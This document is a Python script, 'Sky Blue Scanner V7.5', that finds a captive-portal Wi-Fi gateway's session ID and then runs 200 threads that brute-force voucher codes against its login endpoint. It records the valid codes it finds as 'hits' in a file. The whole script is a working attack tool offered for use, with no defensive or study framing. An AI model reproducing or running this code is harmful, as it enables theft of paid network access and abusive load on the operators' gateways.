import requests
import random
import string
import time
import os
import threading
import re
import sys
import urllib3
from queue import Queue, Empty
from urllib.parse import urlparse, parse_qs, urljoin
from datetime import datetime

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# ===============================
# CONFIGURATION (NO KEY SYSTEM)
# ===============================
SAVE_PATH = "/storage/emulated/0/zapya/hits.txt"
STATS_FILE = "/storage/emulated/0/zapya/total_stats.txt"

# Colors
B_CYAN = "\033[1;36m"; RESET = "\033[0m"; B_GREEN = "\033[1;32m"
B_RED = "\033[1;31m"; YELLOW = "\033[1;33m"; CYAN = "\033[0;36m"
WHITE = "\033[1;37m"

# Performance Settings (Original Values)
NUM_THREADS = 200             
SESSION_POOL_SIZE = 50        
PER_SESSION_MAX = 300         
CODE_LENGTH = 6 
CHAR_SET = string.digits 

# ==============================
# GLOBALS & PERSISTENCE
# ==============================
session_pool = Queue()
valid_codes = [] 
tried_codes = set()
valid_lock = threading.Lock()
file_lock = threading.Lock()
DETECTED_BASE_URL = None
TOTAL_HITS = 0
CURRENT_CODE = ""
START_TIME = time.time()
stop_event = threading.Event()

if os.path.exists(STATS_FILE):
    try:
        with open(STATS_FILE, "r") as f:
            TOTAL_TRIED = int(f.read().strip())
    except: TOTAL_TRIED = 0
else: TOTAL_TRIED = 0

# ===============================
# UI & UTILITY
# ===============================
def print_banner():
    print(f"{B_CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━{RESET}")
    print(f"{B_CYAN}         S K Y   B L U E   S C A N N E R  -  V 7 . 5          {RESET}")
    print(f"{B_CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━{RESET}")

def select_mode_and_run():
    global CODE_LENGTH, CHAR_SET, stop_event
    
    while True:
        os.system('clear')
        print_banner()
        print(f"\n {B_CYAN}[ SELECT SCAN MODE ]{RESET}")
        print(f" {B_CYAN}┏[{YELLOW}1{B_CYAN}]━ {WHITE}Scan 6-Digit (000000)")
        print(f" {B_CYAN}┏[{YELLOW}2{B_CYAN}]━ {WHITE}Scan 7-Digit (0000000)")
        print(f" {B_CYAN}┏[{YELLOW}3{B_CYAN}]━ {WHITE}Scan 8-Digit (00000000)")
        print(f" {B_CYAN}┏[{YELLOW}4{B_CYAN}]━ {WHITE}Scan 9-Digit (000000000)")
        print(f" {B_CYAN}┏[{YELLOW}5{B_CYAN}]━ {WHITE}Alphanumeric Mode (a-z, 0-9)")
        print(f" {B_CYAN}┏[{YELLOW}6{B_CYAN}]━ {WHITE}Custom Code (ifhuef format)")
        print(f" {B_CYAN}┏[{B_RED}7{B_CYAN}]━ {WHITE}EXIT SCANNER")
        
        choice = input(f"\n{B_CYAN}Choose (1-7): {RESET}")
        
        if choice == "7":
            sys.exit()
        
        if choice == "2": 
            CODE_LENGTH = 7; CHAR_SET = string.digits
        elif choice == "3": 
            CODE_LENGTH = 8; CHAR_SET = string.digits
        elif choice == "4": 
            CODE_LENGTH = 9; CHAR_SET = string.digits
        elif choice == "5" or choice == "6":
            CODE_LENGTH = 6; CHAR_SET = string.ascii_lowercase + string.digits 
        else: 
            CODE_LENGTH = 6; CHAR_SET = string.digits
        
        print(f"{B_GREEN}[!] Initializing Turbo Engine...{RESET}")
        time.sleep(1)
        
        stop_event.clear()
        run_scanner_core()

def save_progress():
    try:
        os.makedirs(os.path.dirname(STATS_FILE), exist_ok=True)
        with file_lock:
            with open(STATS_FILE, "w") as f: f.write(str(TOTAL_TRIED))
    except: pass

# ==============================
# SCANNER ENGINE
# ==============================
def get_sid_from_gateway():
    global DETECTED_BASE_URL
    s = requests.Session()
    try:
        r1 = s.get("http://gstatic.com", allow_redirects=True, timeout=5)
        path_match = re.search(r"location\.href\s*=\s*['\"]([^'\"]+)['\"]", r1.text)
        final_url = urljoin(r1.url, path_match.group(1)) if path_match else r1.url
        if path_match:
            r2 = s.get(final_url, timeout=5)
            final_url = r2.url
        parsed = urlparse(final_url)
        DETECTED_BASE_URL = f"{parsed.scheme}://{parsed.netloc}"
        sid = parse_qs(parsed.query).get('sessionId', [None])[0]
        return sid
    except: return None

def session_refiller():
    while not stop_event.is_set():
        try:
            if session_pool.qsize() < SESSION_POOL_SIZE:
                sid = get_sid_from_gateway()
                if sid: session_pool.put({'sessionId': sid, 'left': PER_SESSION_MAX})
            time.sleep(0.5)
        except: time.sleep(2)

def worker():
    global TOTAL_TRIED, TOTAL_HITS, CURRENT_CODE
    client = requests.Session()
    client.verify = False
    
    while not stop_event.is_set():
        try:
            session_data = session_pool.get(timeout=3)
            sid = session_data['sessionId']
            remaining = session_data['left']
            
            for _ in range(remaining):
                if stop_event.is_set(): break
                code = ''.join(random.choices(CHAR_SET, k=CODE_LENGTH))
                
                if code in tried_codes: continue
                
                with valid_lock:
                    tried_codes.add(code)
                    CURRENT_CODE = code
                    TOTAL_TRIED += 1

                target_url = f"{DETECTED_BASE_URL}/index.php/login/auth"
                payload = {
                    'auth_type': 'voucher',
                    'voucher_code': code,
                    'sessionId': sid
                }

                try:
                    resp = client.post(target_url, data=payload, timeout=4)
                    if "success" in resp.text.lower() or resp.status_code == 302:
                        with valid_lock:
                            TOTAL_HITS += 1
                            print(f"\n{B_GREEN}[★] HIT FOUND: {code}{RESET}")
                            with open(SAVE_PATH, "a") as f:
                                f.write(f"{datetime.now()} | {code}\n")
                except:
                    break 

            session_pool.task_done()
        except Empty: continue
        except: time.sleep(1)

def run_scanner_core():
    threading.Thread(target=session_refiller, daemon=True).start()
    
    for _ in range(NUM_THREADS):
        threading.Thread(target=worker, daemon=True).start()

    try:
        while not stop_event.is_set():
            elapsed = time.time() - START_TIME
            speed = TOTAL_TRIED / elapsed if elapsed > 0 else 0
            sys.stdout.write(
                f"\r{B_CYAN}[SCANNING]{RESET} | "
                f"Tried: {YELLOW}{TOTAL_TRIED}{RESET} | "
                f"Hits: {B_GREEN}{TOTAL_HITS}{RESET} | "
                f"Speed: {WHITE}{speed:.1f}/s{RESET} | "
                f"Current: {CYAN}{CURRENT_CODE}{RESET}   "
            )
            sys.stdout.flush()
            save_progress()
            time.sleep(0.5)
    except KeyboardInterrupt:
        stop_event.set()
        print(f"\n{B_RED}[!] Stopped by User.{RESET}")

if __name__ == "__main__":
    select_mode_and_run()
